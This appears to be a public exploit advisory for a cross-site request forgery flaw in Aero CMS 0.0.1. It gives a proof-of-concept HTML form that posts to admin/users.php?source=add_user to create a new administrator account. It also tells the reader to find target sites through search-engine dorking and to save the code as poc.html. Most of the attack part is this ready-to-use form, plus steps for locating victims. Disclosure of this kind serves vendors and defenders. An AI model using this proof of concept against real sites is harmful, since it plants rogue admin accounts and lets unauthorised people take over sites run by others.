Headline
Aero CMS 0.0.1 Cross Site Request Forgery
Aero CMS version 0.0.1 suffers from a cross site request forgery vulnerability.
=============================================================================================================================================| # Title : Aero CMS v0.0.1 CSRF Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) || # Vendor : https://codeload.github.com/MegaTKC/AeroCMS/zip/refs/heads/master |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 9.[+] Set the target site link Save changes and apply . [+] infected file : admin/users.php?source=add_user[+] save code as poc.html .<form action="https://127.0.0.1/pepopecocom/admin/users.php?source=add_user" method="POST"> <div> <label for="username">Username:</label> <input type="text" id="username" name="username" required> </div> <div> <label for="password">Password:</label> <input type="password" id="password" name="password" required> </div> <div> <label for="user_email">Email:</label> <input type="email" id="user_email" name="user_email" required> </div> <div> <label for="user_first_name">First Name:</label> <input type="text" id="user_first_name" name="user_first_name" required> </div> <div> <label for="user_last_name">Last Name:</label> <input type="text" id="user_last_name" name="user_last_name" required> </div> <div> <label for="user_image">Profile Image:</label> <input type="file" id="user_image" name="user_image"> </div> <div> <label for="user_role">User Role:</label> <select id="user_role" name="user_role" required> <option value="admin">Admin</option> <option value="editor">Editor</option> <option value="subscriber">Subscriber</option> </select> </div> <div> <button type="submit" name="create_user">Create User</button> </div></form>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================